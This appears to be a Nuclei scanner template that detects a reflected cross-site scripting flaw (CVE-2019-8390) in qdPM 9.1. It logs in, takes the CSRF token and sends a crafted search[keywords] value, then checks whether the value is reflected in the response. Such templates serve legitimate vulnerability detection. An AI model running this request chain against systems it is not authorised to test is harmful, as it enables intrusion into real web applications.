id: CVE-2019-8390 info: name: qdPM 9.1 - Cross-site Scripting author: theamanrawat severity: medium description: | qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. remediation: | Upgrade to a patched version of qdPM or apply the necessary security patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/46399/ - http://qdpm.net/download-qdpm-free-project-management - https://nvd.nist.gov/vuln/detail/CVE-2019-8390 - http://sourceforge.net/projects/qdpm classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-8390 cwe-id: CWE-79 epss-score: 0.0161 epss-percentile: 0.86007 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 tags: cve,cve2019,xss,qdpm,authenticated,edb http: - raw: - | GET /index.php/login HTTP/1.1 Host: {{Hostname}} - | POST /index.php/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer= - | POST /index.php/users HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded search[keywords]=e">&search_by_extrafields[]=9 cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '' - 'alert alert-info alert-search-result' condition: and - type: word part: header words: - 'text/html' - type: status status: - 200 extractors: - type: regex name: csrf group: 1 regex: - 'name="login\[_csrf_token\]" value="(.*?)"' internal: true part: body # digest: 4a0a00473045022100db2148a682c84e0c655f4b8d8144e1f85bbb0d6610ff43e099ab2162d9075184022066b137fb5a1e4cf829e8d570f1fcfc0b2b1cd8c2cc0a557711bc0b26c927897e:922c64590222798bb761d5b6d8e72950